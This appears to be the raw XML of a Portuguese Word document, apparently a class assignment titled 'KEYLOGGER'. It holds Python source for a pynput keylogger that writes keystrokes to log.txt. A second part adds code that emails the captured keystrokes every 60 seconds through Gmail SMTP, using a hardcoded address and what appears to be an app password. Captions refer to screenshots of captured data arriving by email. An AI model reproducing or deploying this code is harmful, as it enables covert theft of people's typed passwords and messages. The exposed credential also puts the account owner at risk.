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4340" w:rsidRDefault="00DF4340" w:rsidP="00DF4340">
      <w:r>
        <w:t>KEYLOGGER</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF4340" w:rsidRDefault="00DF4340" w:rsidP="00DF4340"/>
    <w:p w:rsidR="00DF4340" w:rsidRDefault="00DF4340" w:rsidP="00DF4340">
      <w:r>
        <w:t xml:space="preserve">1 – </w:t>
      </w:r>
      <w:r w:rsidR="00C9225A">
        <w:t>Código</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> keylogger</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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from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pynput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ignorar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shift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shift</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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_r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ctrl</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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_l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ctrl</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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_r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alt_l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alt_r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caps</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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_lock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backspace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tab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cmd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esc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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on_press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try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#Se for tecla normal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"log.txt"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encoding</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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.char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  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except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AttributeError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open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"log.txt"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"a"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encoding</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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"utf-8"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==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space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 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elif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==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enter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elif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==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tab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\t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elif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==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backspace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 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elif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==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esc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"[ESC]"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elif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ignorar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pass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else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f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"[</w:t>
      </w:r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{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]"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Listener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on_press</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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on_press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listener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listener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join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  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Default="00DF4340" w:rsidP="00DF4340"/>
    <w:p w:rsidR="00DF4340" w:rsidRDefault="00DF4340" w:rsidP="00DF4340"/>
    <w:p w:rsidR="00DF4340" w:rsidRDefault="00DF4340" w:rsidP="00DF4340">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Image: Keylogger rodando </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF4340" w:rsidRDefault="00DF4340" w:rsidP="00DF4340">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="3045172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5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340" w:rsidRDefault="00DF4340" w:rsidP="00DF4340">
      <w:r>
        <w:t>Image Keylogger captando dados:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF4340" w:rsidRDefault="00DF4340" w:rsidP="00DF4340">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B6F9266" wp14:editId="025059A1">
            <wp:extent cx="5400040" cy="1427480"/>
            <wp:effectExtent l="0" t="0" r="0" b="127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340" w:rsidRDefault="00DF4340" w:rsidP="00DF4340"/>
    <w:p w:rsidR="00DF4340" w:rsidRDefault="00DF4340" w:rsidP="00DF4340">
      <w:r>
        <w:t xml:space="preserve">Código envio de dados Keylogger para e-mail: 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from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pynput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smtplib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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from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email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mime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text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MIMEText</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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from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threading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Timer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from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keylogger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import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on_press</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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#Configurações do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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email</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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EMAIL_ORIGEM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"patcholasat@gmail.com"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EMAIL_DESTINO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"patcholasat@gmail.com"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SENHA_EMAIL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staz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jjbm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alzr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lywe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 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF4340" w:rsidRPr="00DF4340" w:rsidRDefault="00DF4340" w:rsidP="00DF434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enviar_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email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</w:t>
      </w:r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global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msg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MIMEText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msg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Subject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'Dados Capturados Keylogger'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msg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From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EMAIL_ORIGEM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msg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[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proofErr w:type="spellStart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To</w:t>
      </w:r>
      <w:proofErr w:type="spell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]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EMAIL_DESTINO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try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server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smtplib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SMTP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'smtp.gmail.com'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587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server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starttls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server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login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EMAIL_ORIGEM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SENHA_EMAIL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server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</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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_message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msg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server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quit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except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Exception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print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 ao enviar"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""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#agendar envio a cada 60 segundos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Timer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60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enviar_email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start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on_press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DF4340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global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try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.char</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/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except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AttributeError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==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space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 "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elif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key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.key.enter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DF4340">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D7BA7D"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:t>\n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elif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.key.backspace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log</w:t>
      </w:r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DF4340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"[&lt;]"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else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: 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    </w:t>
      </w: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pass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DF4340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#ignorar teclas especiais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with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keyboard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Listener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on_press</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF4340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on_press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DF4340">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="CE92A4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:t>as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listener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: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enviar_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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email</w:t>
      </w:r>
      <w:proofErr w:type="spell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DF4340" w:rsidRPr="00DF4340" w:rsidRDefault="00DF4340" w:rsidP="00DF43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DF434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listener</w:t>
      </w:r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DF4340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join</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF4340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DF4340" w:rsidRDefault="00DF4340" w:rsidP="00DF4340"/>
    <w:p w:rsidR="00DF4340" w:rsidRDefault="00DF4340" w:rsidP="00DF4340"/>
    <w:p w:rsidR="00DF4340" w:rsidRDefault="00DF4340" w:rsidP="00DF4340"/>
    <w:p w:rsidR="00DF4340" w:rsidRDefault="00DF4340" w:rsidP="00DF4340"/>
    <w:p w:rsidR="00DF4340" w:rsidRDefault="00DF4340" w:rsidP="00DF4340"/>
    <w:p w:rsidR="00DF4340" w:rsidRDefault="00DF4340" w:rsidP="00DF4340"/>
    <w:p w:rsidR="00DF4340" w:rsidRDefault="00DF4340" w:rsidP="00DF4340"/>
    <w:p w:rsidR="00DF4340" w:rsidRDefault="00DF4340" w:rsidP="00DF4340"/>
    <w:p w:rsidR="00DF4340" w:rsidRDefault="00DF4340" w:rsidP="00DF4340"/>
    <w:p w:rsidR="00DF4340" w:rsidRDefault="00DF4340" w:rsidP="00DF4340"/>
    <w:p w:rsidR="00DF4340" w:rsidRDefault="00DF4340" w:rsidP="00DF4340">
      <w:r>
        <w:t xml:space="preserve">Imagem dados recebidos e-mail: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF4340" w:rsidRDefault="00DF4340" w:rsidP="00DF4340">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4743450" cy="20383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F43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097F65"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="20DE66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40"/>
    <w:rsid w:val="00B735B2"/>
    <w:rsid w:val="00C9225A"/>
    <w:rsid w:val="00DF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A80045-E31B-4580-B1F7-28D2D3B0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F43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76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0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6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.</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>lucas .</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-20T12:41:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-20T12:41:00Z</dcterms:modified>
</cp:coreProperties>
</file>